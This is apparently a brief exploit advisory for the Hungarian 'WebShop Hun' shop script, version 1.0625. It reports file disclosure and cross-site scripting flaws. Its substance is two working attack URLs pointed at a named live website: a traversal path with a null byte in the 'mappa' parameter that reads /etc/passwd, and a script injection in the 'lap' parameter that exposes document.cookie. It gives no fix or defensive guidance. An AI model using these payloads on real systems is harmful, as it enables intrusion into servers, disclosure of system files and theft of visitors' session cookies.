WebShop Hun version 1.0625 suffers from file disclosure and cross site scripting vulnerabilities.
da5120a5f777b7d53ca9ade17ea94f2c0cfed2ef5c0d1d76716d1736f523630e
***********************************************************
*
WEB SHOP HUN (LFI/XSS) Multiple Remote Vulnerabilities *
*
*
*
***********************************************************
[>>] Autor: U.F.
[>>] Mail: expiries
[>>] Script: WebShop Hun
[>>] Version: v1.062S (meybe older)
[>>] Price: 30.000 Ft.(hungary)
[>>] Download: http://www.netprog.eu
************************************************
*
[>>] special greetz : Jason , Bull *
*
************************************************
Exploit Info :
--LFI--
Example: http://india-biocosmetics.com/index.php?param=1&nyelv_id=4&mappa=../../../../../../../etc/passwd%00
--XSS--
Example: http://india-biocosmetics.com/index.php?param=1&lap=<script>alert(document.cookie)</script>&bejelentkezes=nincs